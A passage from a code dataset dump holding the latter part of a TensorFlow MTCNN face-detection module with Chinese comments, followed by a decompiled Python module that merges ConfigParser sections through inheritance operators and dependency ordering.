\"\"\"\n raise NotImplementedError( 'Must be implemented by the subclass' )\n\n def load(self, data_path, session, ignore_missing=False ):\n '''\n DESC: Load network weights.\n :param data_path: The path to the numpy-serialized network weights\n :param session: The current TensorFlow session\n :param ignore_missing: If true, serialized weights for missing layers are ignored.\n :return:\n '''\n data_dict = np.load( data_path, encoding='latin1' ).item()\n\n for op_name in data_dict:\n with tf.variable_scope( op_name, reuse=True ):\n for param_name, data in iteritems( data_dict[ op_name] ):\n try:\n var = tf.get_variable( param_name )\n session.run( var.assign( data ) )\n except ValueError:\n if not ignore_missing:\n raise\n\n def feed(self, *args ):\n '''\n DESC: Set the input(s) for the next operation by replacing the terminal nodes.\n The arguments can be either layer names or the actual layers.\n :param args:\n :return:\n '''\n assert len( args ) != 0\n self.terminals = []\n for fed_layer in args:\n if isinstance( fed_layer, string_types ):\n try:\n fed_layer = self.layers[ fed_layer ]\n except KeyError:\n raise KeyError( 'Unknown layer name fed %s' % fed_layer )\n\n self.terminals.append( fed_layer )\n\n return self\n\n def get_output(self):\n '''\n DESC: Returns the current network output.\n :return:\n '''\n return self.terminals[ -1 ]\n\n def get_unique_name(self, prefix ):\n '''\n DESC: Returns an index-suffixed unique name for the given prefix.\n This is used for auto-generating layer names based on the type-prefix.\n :param prefix:\n :return:\n '''\n ident = sum( t.startswith( prefix ) for t, _ in self.layers.items() ) + 1\n return '%s_%d' % ( prefix, ident )\n\n def make_var(self, name, shape ):\n '''\n Creates a new TensorFlow variable\n :param name:\n :param shape:\n :return:\n '''\n return tf.get_variable( name, shape, trainable=self.trainable )\n\n def validate_padding(self, padding ):\n '''\n Verifies that the padding is one of the supported ones\n :param padding:\n :return:\n '''\n assert padding in ( 'SAME', 'VALID' )\n\n\n @layer\n def conv(self,\n inp,\n k_h,\n k_w,\n c_o,\n s_h,\n s_w,\n name,\n relu=True,\n padding='SAME',\n group=1,\n biased=True ):\n '''\n\n :param inp:\n :param k_h:\n :param k_w:\n :param c_o:\n :param s_h:\n :param s_w:\n :param name:\n :param relu:\n :param padding:\n :param group:\n :param biased:\n :return:\n '''\n #Verify that the padding( padding )\n self.validate_padding( padding )\n # Get the number of channels in the input\n c_i = int( inp.get_shape()[-1] )\n #Verify that the grouping parameter is valid\n assert c_i % group == 0\n assert c_o % group == 0\n #Convolution for a given input and kernel\n convolve = lambda i, k: tf.nn.conv2d( i, k, [1, s_h, s_w, 1], padding=padding )\n with tf.variable_scope( name ) as scope:\n kernel = self.make_var( 'weights', shape=[ k_h, k_w, c_i//group, c_o ] )\n #This is the common-case. 
Convolve the input without any further complications.\n output = convolve( inp, kernel )\n #Add the biases\n if biased:\n biases = self.make_var( 'biases', [ c_o ] )\n output = tf.nn.bias_add( output, biases )\n if relu:\n # ReLU non-linearity\n output = tf.nn.relu( output, name=scope.name )\n\n return output\n\n @layer\n def prelu(self, inp, name ):\n '''\n\n :param inp:\n :param name:\n :return:\n '''\n with tf.variable_scope( name ):\n i = int( inp.get_shape()[-1] )\n alpha = self.make_var( 'alpha', shape=(i, ) )\n output = tf.nn.relu( inp ) + tf.multiply( alpha, -tf.nn.relu( -inp) )\n return output\n\n @layer\n def max_pool(self, inp, k_h, k_w, s_h, s_w, name, padding='SAME' ):\n '''\n MAX POOL\n :param inp:\n :param k_h:\n :param k_w:\n :param s_h:\n :param s_w:\n :param name:\n :param padding:\n :return:\n '''\n self.validate_padding( padding )\n return tf.nn.max_pool( inp,\n ksize=[ 1, k_h, k_w, 1 ],\n strides=[ 1, s_h, s_w, 1 ],\n padding=padding,\n name=name )\n\n @layer\n def fc(self, inp, num_out, name, relu=True ):\n '''\n FULL connect layer\n :param inp:\n :param num_out:\n :param name:\n :param relu:\n :return:\n '''\n with tf.variable_scope( name ):\n input_shape = inp.get_shape()\n if input_shape.ndims == 4:\n # The input is spatial. Vectorize it first.\n dim = 1\n for d in input_shape[ 1: ].as_list():\n dim *= int(d)\n feed_in = tf.reshape( inp, [ -1, dim ] )\n else:\n feed_in, dim = ( inp, input_shape[-1].value )\n weights = self.make_var( 'weights', shape=[ dim, num_out ] )\n biases = self.make_var( 'biases', [num_out] )\n op = tf.nn.relu_layer if relu else tf.nn.xw_plus_b\n fc = op( feed_in, weights, biases, name=name )\n\n return fc\n\n \"\"\"\n Multi dimensional softmax,\n refer to https://github.com/tensorflow/tensorflow/issues/210\n compute softmax along the dimension of target\n the native softmax only supports batch_size x dimension\n \"\"\"\n @layer\n def softmax(self, target, axis, name=None ):\n max_axis = tf.reduce_max( target, axis, keepdims=True )\n target_exp = tf.exp( target - max_axis )\n normalize = tf.reduce_sum( target_exp, axis=axis, keepdims=True )\n softmax = tf.div( target_exp, normalize, name )\n return softmax\n\n\nclass PNet( Network ):\n\n def setup(self):\n ( self.feed( 'data' ) #pylint: disable=no-value-for-parameter, no-member\n .conv( 3, 3, 10, 1, 1, padding='VALID', relu=False, name='conv1')\n .prelu( name='PReLU1' )\n .max_pool( 2, 2, 2, 2, name='pool1' )\n .conv( 3, 3, 16, 1, 1, padding='VALID', relu=False, name='conv2' )\n .prelu( name='PReLU2' )\n .conv( 3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv3' )\n .prelu( name='PReLU3' )\n .conv( 1, 1, 2, 1, 1, relu=False, name='conv4-1' )\n .softmax( 3, name='prob1' )\n )###二分类,即为人脸的概率\n ( self.feed( 'PReLU3') #pylint: disable=no-value-for-parameter\n .conv( 1, 1, 4, 1, 1, relu=False, name='conv4-2' )\n )#预测框(Boundingbox)偏移回归\n\nclass RNet( Network ):\n def setup(self ):\n ( self.feed( 'data')#pylint: disable=no-value-for-parameter, no-member\n .conv( 3, 3, 28, 1, 1, padding='VALID', relu=False, name='conv1' )\n .prelu( name='prelu1' )\n .max_pool( 3, 3, 2, 2, name='pool1' )\n .conv( 3, 3, 48, 1, 1, padding='VALID', relu=False, name='conv2' )\n .prelu( name='prelu2' )\n .max_pool( 3, 3, 2, 2, padding='VALID', name='pool2' )\n .conv( 2, 2, 64, 1, 1, padding='VALID', relu=False, name='conv3' )\n .prelu( name='prelu3' )\n .fc( 128, relu=False, name='conv4' )\n .prelu( name='prelu4' )\n .fc( 2, relu=False, name='conv5-1' )\n .softmax( 1, name='prob1')\n )\n ( self.feed( 'prelu4' )\n .fc( 
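The prelu op above computes relu(x) + alpha * (-relu(-x)), which equals x for positive inputs and alpha * x for negative ones; a tiny numpy check of that identity:

import numpy as np

relu = lambda v: np.maximum(v, 0.0)
x, alpha = np.array([-2.0, 3.0]), 0.25
print(relu(x) - alpha * relu(-x))   # [-0.5  3. ]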
4, relu=False, name='conv5-2' )\n )\n\nclass ONet( Network ):\n def setup(self ):\n ( self.feed( 'data') #pylint: disable=no-value-for-parameter, no-member\n .conv( 3, 3, 32, 1, 1, padding='VALID', relu=False, name='conv1' )\n .prelu( name='prelu1' )\n .max_pool( 3, 3, 2, 2, name='pool1' )\n .conv( 3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv2' )\n .prelu( name='prelu2' )\n .max_pool( 3, 3, 2, 2, padding='VALID', name='pool2' )\n .conv( 3, 3, 64, 1, 1, padding='VALID', relu=False, name='conv3' )\n .prelu( name='prelu3' )\n .max_pool( 2, 2, 2, 2, name='pool3' )\n .conv( 2, 2, 128, 1, 1, padding='VALID', relu=False, name='conv4' )\n .prelu( name='prelu4' )\n .fc( 256, relu=False, name='conv5' )\n .prelu( name='prelu5' )\n .fc( 2, relu=False, name='conv6-1' )\n .softmax( 1, name='prob1' )\n )\n ( self.feed( 'prelu5')\n .fc( 4, relu=False, name='conv6-2')\n )\n ( self.feed( 'prelu5' )\n .fc( 10, relu=False, name='conv6-3')\n )\n\ndef create_mtcnn( sess, model_path ):\n '''\n\n :param sess:\n :param model_path:\n :return:\n '''\n if not model_path:\n model_path, _ = os.path.split( os.path.realpath( __file__ ) )\n\n with tf.variable_scope( 'pnet' ):\n data = tf.placeholder( tf.float32, ( None, None, None, 3 ), 'input' )\n pnet = PNet( { 'data': data } )\n pnet.load( os.path.join( model_path, 'det1.npy'), sess )\n with tf.variable_scope( 'rnet' ):\n data = tf.placeholder( tf.float32, ( None, 24, 24, 3 ), 'input' )\n rnet = RNet( { 'data' : data } )\n rnet.load( os.path.join( model_path, 'det2.npy'), sess )\n with tf.variable_scope( 'onet' ):\n data = tf.placeholder( tf.float32, ( None, 48, 48, 3 ), 'input' )\n onet = ONet( { 'data' : data } )\n onet.load( os.path.join( model_path, 'det3.npy'), sess )\n\n pnet_fun = lambda img: sess.run( ('pnet/conv4-2/BiasAdd:0', 'pnet/prob1:0'), feed_dict={ 'pnet/input:0' : img } )\n rnet_fun = lambda img: sess.run( ('rnet/conv5-2/conv5-2:0', 'rnet/prob1:0'), feed_dict={ 'rnet/input:0': img } )\n onet_fun = lambda img: sess.run( ('onet/conv6-2/conv6-2:0', 'onet/conv6-3/conv6-3:0', 'onet/prob1:0' ), feed_dict={ 'onet/input:0': img } )\n\n return pnet_fun, rnet_fun, onet_fun\n\ndef detect_face( img, minsize, pnet, rnet, onet, threshold, factor ):\n '''\n DESC: Detects faces in an image, and returns bounding boxes and points for them.\n :param img: input image\n :param minsize: minimum faces' size\n :param pnet: model\n :param rnet: model\n :param onet: modelmodel\n :param threshold: threshold=[th1, th2, th3], th1-3 are three steps's threshold\n :param factor: the factor used to create a scaling pyramid of face sizes to detect in the image.\n :return:\n '''\n orgImgage = img.copy()\n factor_count = 0\n total_boxes = np.empty( ( 0, 9 ))\n points = np.empty( 0 )\n h = img.shape[0]\n w = img.shape[1]\n minl = np.amin( [ h, w ] )\n m = 12.0 / minsize\n minl = minl * m\n #\n scales = []\n while minl >= 12: #只要图像size>12像素,就进行缩放,scales记录每次缩放比例\n scales += [ m * np.power( factor, factor_count ) ]\n minl = minl * factor\n factor_count += 1\n\n # first stage\n for scale in scales:\n hs = int( np.ceil( h * scale ) )\n ws = int( np.ceil( w * scale ) )\n im_data = imresample( img, ( hs, ws ) ) #对图像按缩放比例缩放\n\n im_data = ( im_data - 127.5 ) * 0.0078125\n img_x = np.expand_dims( im_data, 0 )\n img_y = np.transpose( img_x, ( 0, 2 ,1, 3 ) )\n out = pnet( img_y ) ##输入pnet网络中,获得输出\n out0 = np.transpose( out[0], ( 0, 2, 1, 3 ) ) ###二分类,即为人脸的概率\n out1 = np.transpose( out[1], ( 0, 2, 1, 3 ) ) ###预测框偏移回归 out0 size(1,H/12,W/12,2)\n\n boxes, _ = generateBoundingBox( out1[ 0, :, 
\n    # first stage\n    for scale in scales:\n        hs = int( np.ceil( h * scale ) )\n        ws = int( np.ceil( w * scale ) )\n        im_data = imresample( img, ( hs, ws ) ) # resize the image by the current pyramid scale\n\n        im_data = ( im_data - 127.5 ) * 0.0078125 # normalize pixels to roughly [-1, 1] (0.0078125 = 1/128)\n        img_x = np.expand_dims( im_data, 0 )\n        img_y = np.transpose( img_x, ( 0, 2 ,1, 3 ) )\n        out = pnet( img_y ) ## run the scaled image through PNet\n        out0 = np.transpose( out[0], ( 0, 2, 1, 3 ) ) ### bounding-box offset regression, shape (1, H', W', 4)\n        out1 = np.transpose( out[1], ( 0, 2, 1, 3 ) ) ### two-way softmax, shape (1, H', W', 2); channel 1 is the face probability\n\n        boxes, _ = generateBoundingBox( out1[ 0, :, :, 1 ].copy(), out0[0, :, :, :].copy(), scale, threshold[0] )\n\n        #showTempImage( img[:, :, ::-1], boxes )\n        # inter-scale nms\n        pick = nms( boxes.copy(), 0.5, 'Union' )\n        if boxes.size > 0 and pick.size > 0:\n            boxes = boxes[ pick, : ]\n            total_boxes = np.append( total_boxes, boxes, axis=0 )\n\n    numbox = total_boxes.shape[0]\n    if numbox > 0:\n        pick = nms( total_boxes.copy(), 0.7, 'Union' )\n        total_boxes = total_boxes[ pick, : ]\n        regw = total_boxes[ :, 2 ] - total_boxes[ :, 0 ]\n        regh = total_boxes[ :, 3 ] - total_boxes[ :, 1 ]\n        qq1 = total_boxes[ :, 0 ] + total_boxes[ :, 5 ] * regw\n        qq2 = total_boxes[ :, 1 ] + total_boxes[ :, 6 ] * regh\n        qq3 = total_boxes[ :, 2 ] + total_boxes[ :, 7 ] * regw\n        qq4 = total_boxes[ :, 3 ] + total_boxes[ :, 8 ] * regh\n        total_boxes = np.transpose( np.vstack( [ qq1, qq2, qq3, qq4, total_boxes[:,4] ] ) ) # refined top-left and bottom-right corners followed by the score\n        total_boxes = rerec( total_boxes.copy() )\n        total_boxes[ :, 0:4 ] = np.fix( total_boxes[ :, 0:4 ] ).astype( np.int32) ## truncate the coordinates to integers\n        dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph = pad( total_boxes.copy(), w, h )\n\n        showTempImage( img[:, :, ::-1], total_boxes )\n\n    numbox = total_boxes.shape[0]\n    if numbox > 0:\n        # second stage\n        tempimg = np.zeros( ( 24, 24, 3, numbox ) )\n        # crop each candidate box from the original image and resize it to 24x24 for RNet\n        for k in range( 0, numbox ):\n            tmp = np.zeros( ( int( tmph[k] ), int( tmpw[k] ), 3 ) )\n            tmp[ dy[k] -1 : edy[k], dx[k]-1:edx[k], : ] = img[ y[k]-1:ey[k], x[k]-1:ex[k], : ] # crop\n            if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:\n                tempimg[ :, :, :, k ] = imresample( tmp, ( 24, 24 ) ) # resize\n            else:\n                return np.empty( 0 )\n\n        tempimg = ( tempimg - 127.5 ) * 0.0078125\n        tempimg1 = np.transpose( tempimg, ( 3, 1, 0, 2 ) )\n        out = rnet( tempimg1 ) # RNet yields a two-way face/non-face softmax and 4 bbox offsets per crop\n        out0 = np.transpose( out[0] )\n        out1 = np.transpose( out[1] )\n        score = out1[ 1, : ]\n        ipass = np.where( score > threshold[1] ) # drop most non-face candidates by classification score\n        total_boxes = np.hstack( [ total_boxes[ ipass[0], 0:4 ].copy(), np.expand_dims( score[ipass].copy(), 1 ) ] )\n        mv = out0[ :, ipass[0] ]\n        if total_boxes.shape[0] > 0:\n            pick = nms( total_boxes, 0.7, 'Union' )\n            total_boxes = total_boxes[ pick, : ]\n            total_boxes = bbreg( total_boxes.copy(), np.transpose( mv[:, pick] ) )\n            total_boxes = rerec( total_boxes.copy() )\n\n            showTempImage( img[:, :, ::-1], total_boxes )\n\n    numbox = total_boxes.shape[0]\n    if numbox > 0:\n        # third stage\n        total_boxes = np.fix( total_boxes ).astype( np.int32 )\n        dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph = pad( total_boxes.copy(), w, h )\n        tempimg = np.zeros(( 48, 48, 3, numbox ) )\n        for k in range( 0, numbox ): ## crop the RNet-refined boxes from the original image and resize them to 48x48 for ONet\n            tmp = np.zeros( ( int( tmph[k] ), int( tmpw[k] ), 3 ) )\n            tmp[ dy[k]-1:edy[k], dx[k]-1:edx[k], : ] = img[ y[k]-1:ey[k], x[k]-1:ex[k], : ]\n            if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:\n                tempimg[ :, :, :, k ] = imresample( tmp, ( 48, 48) )\n            else:\n                return np.empty( 0 )\n        tempimg = ( tempimg - 127.5 ) * 0.0078125\n        tempimg1 = np.transpose( tempimg, ( 3, 1, 0, 2 ) )\n        out = onet( tempimg1 )\n        out0 = np.transpose( out[0] )\n        out1 = np.transpose( out[1] )\n        out2 = np.transpose( out[2] )\n        score = out2[ 1, : ]\n        points = out1\n        ipass = np.where( score > threshold[2] )\n        points = points[:,ipass[0]]\n        total_boxes = np.hstack( [ total_boxes[ ipass[0], 0:4].copy(), np.expand_dims( score[ipass].copy(), 1 ) ] )\n        mv = out0[ :, ipass[0] ]\n\n        w = total_boxes[:,2]-total_boxes[:,0]+1\n        h = total_boxes[:,3]-total_boxes[:,1]+1\n
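        # ONet's landmark output appears to be normalized to each box: rows 0-4\n        # hold the x coordinates and rows 5-9 the y coordinates of the five\n        # points; the next two lines map them back to absolute image coordinates.\n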
        points[0:5,:] = np.tile(w,(5, 1))*points[0:5,:] + np.tile(total_boxes[:,0],(5, 1))-1\n        points[5:10,:] = np.tile(h,(5, 1))*points[5:10,:] + np.tile(total_boxes[:,1],(5, 1))-1\n        if total_boxes.shape[0]>0:\n            total_boxes = bbreg(total_boxes.copy(), np.transpose(mv))\n            pick = nms(total_boxes.copy(), 0.7, 'Min')\n            total_boxes = total_boxes[pick,:]\n            points = points[:,pick]\n\n    return total_boxes, points\n\n\ndef bbreg( boundingbox, reg ):\n    '''\n    Refine the bounding boxes by applying the regression offsets.\n    :param boundingbox: boxes as (x1, y1, x2, y2, ...) rows\n    :param reg: per-box offsets, normalized by box width and height\n    :return: the refined boxes\n    '''\n    if reg.shape[1] == 1:\n        reg = np.reshape( reg, ( reg.shape[2], reg.shape[3] ) )\n\n    w = boundingbox[ :, 2 ] - boundingbox[ :, 0 ] + 1\n    h = boundingbox[ :, 3 ] - boundingbox[ :, 1 ] + 1\n    b1 = boundingbox[ :, 0 ] + reg[ :, 0 ] * w\n    b2 = boundingbox[ :, 1 ] + reg[ :, 1 ] * h\n    b3 = boundingbox[ :, 2 ] + reg[ :, 2 ] * w\n    b4 = boundingbox[ :, 3 ] + reg[ :, 3 ] * h\n    boundingbox[ :, 0:4 ] = np.transpose( np.vstack( [ b1, b2, b3, b4 ] ) )\n    return boundingbox\n\ndef generateBoundingBox( imap, reg, scale, t ):\n    '''\n    Use the heatmap to generate bounding boxes.\n    :param imap: face-probability heatmap of one pyramid level\n    :param reg: bounding-box offset maps\n    :param scale: the pyramid scale that produced this heatmap\n    :param t: score threshold\n    :return: for every 12x12 cell above the threshold, its coordinates in the\n             original image, its score and its regression offsets\n    '''\n    stride = 2\n    cellsize = 12\n\n    # transpose the probability map and the four offset maps so the (y, x)\n    # indexing below matches the cell layout\n    imap = np.transpose( imap )\n    dx1 = np.transpose( reg[ :,:,0 ] )\n    dy1 = np.transpose( reg[ :,:,1 ] )\n    dx2 = np.transpose( reg[ :,:,2 ] )\n    dy2 = np.transpose( reg[ :,:,3 ] )\n\n    # keep the cells whose face probability exceeds the threshold; each cell\n    # carries one probability and four coordinate offsets, with (y, x) as its index\n    y, x = np.where( imap >= t )\n\n    if y.shape[0] == 1:\n        dx1 = np.flipud( dx1 ) # flip the matrix upside down (reverse the row order)\n        dy1 = np.flipud( dy1 )\n        dx2 = np.flipud( dx2 )\n        dy2 = np.flipud( dy2 )\n\n    score = imap[ ( y, x ) ] ### the score is the predicted face probability of each kept cell\n    reg = np.transpose( np.vstack( [ dx1[(y,x)], dy1[(y,x)], dx2[(y,x)], dy2[(y,x)] ] ) )\n    if reg.size == 0:\n        reg = np.empty( ( 0, 3 ) )\n    bb = np.transpose( np.vstack( [y,x] ) )\n    # q1 and q2 are the top-left and bottom-right corners of each candidate,\n    # mapped back to the original image\n    q1 = np.fix( (stride * bb + 1) / scale ) # np.fix rounds toward zero\n    q2 = np.fix( (stride * bb + cellsize - 1 + 1) / scale )\n    boundingbox = np.hstack( [ q1, q2, np.expand_dims( score, 1 ), reg ] )\n    return boundingbox, reg\n\ndef pad( total_boxes, w, h ):\n    '''\n    Compute the padding coordinates (pad the bounding boxes to square)\n    and clip the coordinates so they stay inside the image.\n    :param total_boxes: boxes as (x1, y1, x2, y2, ...) rows\n    :param w: image width\n    :param h: image height\n    :return: dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph\n    '''\n    tmpw = ( total_boxes[ :, 2 ] - total_boxes[ :, 0 ] + 1 ).astype( np.int32 )\n    tmph = ( total_boxes[ :, 3 ] - total_boxes[ :, 1 ] + 1 ).astype( np.int32 )\n    numbox = total_boxes.shape[0]\n\n    dx = np.ones( ( numbox ), dtype=np.int32 )\n    dy = np.ones( ( numbox ), dtype=np.int32 )\n    edx = tmpw.copy().astype( np.int32 )\n    edy = tmph.copy().astype( np.int32 )\n\n    x = total_boxes[ :, 0 ].copy().astype( np.int32 )\n    y = total_boxes[ :, 1 ].copy().astype( np.int32 )\n    ex = total_boxes[ :, 2 ].copy().astype( np.int32 )\n    ey = total_boxes[ :, 3 ].copy().astype( np.int32 )\n\n    tmp = np.where( ex > w )\n    edx.flat[ tmp ] = np.expand_dims( -ex[tmp] + w + tmpw[tmp], 1 )\n    ex[ tmp ] = w\n\n    tmp = np.where( ey > h )\n    edy.flat[ tmp ] = np.expand_dims( -ey[tmp] + h + tmph[tmp], 1 )\n    ey[ tmp ] = h\n\n    tmp = np.where( x < 1 )\n    dx.flat[ tmp ] = np.expand_dims( 2 - x[tmp], 1 )\n    x[ tmp ] = 1\n\n    tmp = np.where( y < 1 )\n    dy.flat[ tmp ] = np.expand_dims( 2 - y[tmp], 1 )\n    y[ tmp ] = 1\n\n    return dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph\n
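# Note on pad()'s outputs: (x, y)-(ex, ey) are the clipped source coordinates\n# inside the image and (dx, dy)-(edx, edy) the matching destination coordinates\n# inside each tmpw x tmph crop; both look 1-based, which is why the callers\n# above subtract 1 when slicing.\n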
\ndef rerec( bboxA ):\n    '''\n    Convert the boxes in bboxA to squares: the longer side is kept and the\n    box is re-centered around its original midpoint.\n    :param bboxA: boxes as (x1, y1, x2, y2, ...) rows\n    :return: the squared boxes\n    '''\n    h = bboxA[ :, 3 ] - bboxA[ :, 1 ]\n    w = bboxA[ :, 2 ] - bboxA[ :, 0 ]\n    l = np.maximum( w, h )\n    bboxA[ :, 0 ] = bboxA[ :, 0 ] + w * 0.5 - l * 0.5\n    bboxA[ :, 1 ] = bboxA[ :, 1 ] + h * 0.5 - l * 0.5\n    bboxA[ :, 2:4 ] = bboxA[ :, 0:2 ] + np.transpose( np.tile( l, ( 2, 1 ) ) )\n    return bboxA\n\n'''Non-maximum suppression (NMS): suppress every box that is not a local maximum, keeping only the best-scoring box in each neighborhood.'''\ndef nms( boxes, threshold, method ):\n    '''\n    :param boxes: candidate boxes as (x1, y1, x2, y2, score) rows\n    :param threshold: overlap threshold above which a box is suppressed\n    :param method: 'Min' divides the intersection by the smaller area, anything else uses IoU\n    :return: indices of the boxes to keep\n    '''\n    if boxes.size == 0:\n        return np.empty( (0, 3) )\n    x1 = boxes[ :, 0 ]\n    y1 = boxes[ :, 1 ]\n    x2 = boxes[ :, 2 ]\n    y2 = boxes[ :, 3 ]\n    s = boxes[ :, 4 ] # confidence score of each box\n\n    area = ( x2 - x1 + 1 ) * ( y2 - y1 + 1 ) # area of each box\n    I = np.argsort( s )\n    pick = np.zeros_like( s, dtype=np.int16 )\n    counter = 0\n    while I.size > 0:\n        i = I[-1]\n        pick[ counter ] = i\n        counter += 1\n        idx = I[ 0 : -1 ]\n        xx1 = np.maximum( x1[i], x1[idx] )\n        yy1 = np.maximum( y1[i], y1[idx] )\n        xx2 = np.minimum( x2[i], x2[idx] )\n        yy2 = np.minimum( y2[i], y2[idx] )\n        w = np.maximum( 0.0, xx2-xx1+1 )\n        h = np.maximum( 0.0, yy2-yy1+1 )\n        inter = w * h\n        if method == 'Min':\n            o = inter / np.minimum( area[i], area[idx] )\n        else:\n            o = inter / ( area[i] + area[idx] - inter )\n\n        I = I[ np.where( o <= threshold ) ]\n\n    pick = pick[ 0: counter ]\n    return pick\n\ndef imresample( img, sz ):\n    '''\n    Resize img to the (rows, cols) given in sz.\n    :param img: input image\n    :param sz: target size as (height, width)\n    :return: the resized image\n    '''\n    im_data = cv2.resize( img, ( sz[1], sz[0]), interpolation=cv2.INTER_AREA )\n    return im_data\n\ndef showTempImage( rgb_image, boxes ):\n    '''\n    Debug helper: draw the boxes on a copy of the image and display it.\n    :param rgb_image: input image\n    :param boxes: boxes as (x1, y1, x2, y2, ...) rows\n    :return: None\n    '''\n    #image = rgb_image[ :, :, ::-1 ]\n    image = rgb_image.copy()\n    for i in range( 0, boxes.shape[0] ):\n        image = cv2.rectangle( image,\n                               ( int( boxes[i,0] ), int( boxes[i,1] ) ),\n                               ( int( boxes[i,2] ), int( boxes[i,3] ) ),\n                               ( 255,255, 0 ))\n\n    cv2.imshow( 'Inter Show', image )\n    cv2.waitKey( 0 )\n    cv2.destroyAllWindows()\n","sub_path":"7-1-mtcnn-face-detection/detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":25083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"428986993","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/config_enhance/__init__.py\n# Compiled at: 2013-11-15 17:31:04\nimport logging\nfrom ConfigParser import ConfigParser as CP\n__ALL__ = [\n 'enhance_platform_versions', 'enhance']\nLOG = logging.getLogger(__name__)\n\nclass EnhanceSection(object):\n    \"\"\"Enhance a section based on the content of a << item\n    \n    operators are\n    <[sectionname] - bring in values that don't already exist in the section\n    +[sectionname] - bring in all values, overwriting any current content\n    -[sectionname] - remove values that exist in the named section\n\n    The enhancements are executed in order, which only matters if you use\n    the removal operator.
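    For example, '<< = -legacy <defaults' first strips any keys shared with\n    [legacy], after which the following '<defaults' is free to fill them back in.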
    Then order can impact the behavior of a following\n    '<'.\n    \"\"\"\n\n    def __init__(self, config, name):\n        self.config = config\n        self.name = name\n        self.ops = []\n        self._extract_ops()\n\n    @property\n    def is_complete(self):\n        return len(self.ops) == 0\n\n    def __call__(self):\n        \"\"\"Apply all the enhancements to the current section.\"\"\"\n        for op_type, from_section in self.ops:\n            if op_type == '<':\n                self._enhance_with_base(from_section)\n            elif op_type == '+':\n                self._enhance_with_mixin(from_section)\n            elif op_type == '-':\n                self._enhance_with_removal(from_section)\n\n        self.ops = []\n\n    def _enhance_with_base(self, from_section):\n        for k, v in self.config.items(from_section):\n            if not self.config.has_option(self.name, k):\n                self.config.set(self.name, k, v)\n\n    def _enhance_with_mixin(self, from_section):\n        for k, v in self.config.items(from_section):\n            self.config.set(self.name, k, v)\n\n    def _enhance_with_removal(self, from_section):\n        for k, _ in self.config.items(from_section):\n            self.config.remove_option(self.name, k)\n\n    def _extract_ops(self):\n        op_key = '<<'\n        simple_op_key = '<'\n        if self.config.has_option(self.name, op_key):\n            op_item = self.config.get(self.name, op_key)\n            self.config.remove_option(self.name, op_key)\n            self.ops = parse_ops_from_config_item(op_item)\n        if self.config.has_option(self.name, simple_op_key):\n            value = self.config.get(self.name, simple_op_key)\n            value = value.strip()\n            self.ops.insert(0, ('<', value))\n\n\ndef parse_ops_from_config_item(value):\n    \"\"\"Parse the <<= config item for enhancements.\"\"\"\n    values = [ vv for vv in value.split() if vv ]\n    ops = []\n    next_is_section = False\n    last_op = None\n    for vv in values:\n        if next_is_section:\n            ops.append((last_op, vv))\n            next_is_section = False\n            last_op = None\n        elif len(vv) == 1:\n            # a bare operator; the next token is its section name\n            last_op = vv\n            next_is_section = True\n        elif len(vv) > 1:\n            op, section = vv[0], vv[1:]\n            ops.append((op, section))\n\n    return ops\n\n\nclass Target(object):\n    \"\"\"A target that needs to be built.\n\n    Maintains a list of required inputs, impacted dependants, and the action\n    to perform when the required inputs are complete.\n\n    @reqs - the targets needed to build this target\n    @deps - dependants that need this\n    @action - action to perform to build this target\n\n    The action must be callable with no parameters. 
It must implement\n    \"is_complete\", which should return true when the target that will\n    result from the action is complete.\n\n    The action may just detect that no action is needed and mark itself\n    as complete.\n    \"\"\"\n\n    def __init__(self, action):\n        self.action = action\n        self.reqs = set()\n        self.deps = set()\n        self._reqs_complete = False\n\n    @property\n    def reqs_complete(self):\n        if self._reqs_complete:\n            return True\n        for req in self.reqs:\n            if not req.is_complete:\n                return False\n\n        self._reqs_complete = True\n        return self._reqs_complete\n\n    def __call__(self):\n        \"\"\"Build the target by executing the action.\"\"\"\n        self.action()\n\n    @property\n    def is_complete(self):\n        return self.action.is_complete\n\n\ndef build_targets(targets):\n    \"\"\"Build a list of targets.\n    \n    @targets - collection of targets to build\n\n    Returns the targets that couldn't be built due to unmet requirements.\n    \"\"\"\n    seeds = [ tgt for tgt in targets if tgt.reqs_complete ]\n    built = set()\n    progress_made = True\n    while len(seeds) and progress_made:\n        new_seeds = set()\n        for target in seeds:\n            target()\n            built.add(target)\n            new_seeds.update(target.deps)\n\n        seeds = [ seed for seed in new_seeds if seed.reqs_complete ]\n\n    unbuilt = set(targets).difference(built)\n    return unbuilt\n\n\ndef enhance_platform_versions(cp):\n    section_meta = {}\n    for section in cp.sections():\n        action = EnhanceSection(cp, section)\n        target = Target(action)\n        section_meta[section] = target\n\n    for section, meta in section_meta.iteritems():\n        for op_type, op_section in meta.action.ops:\n            try:\n                other_meta = section_meta[op_section]\n            except KeyError:\n                LOG.error(\"section '%s' requires '%s', but '%s' does not exist\", section, op_section, op_section)\n            else:\n                other_meta.deps.add(meta)\n                meta.reqs.add(other_meta)\n\n    build_targets(section_meta.values())\n\n\nenhance = enhance_platform_versions","sub_path":"pycfiles/config_field-0.2.9.tar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
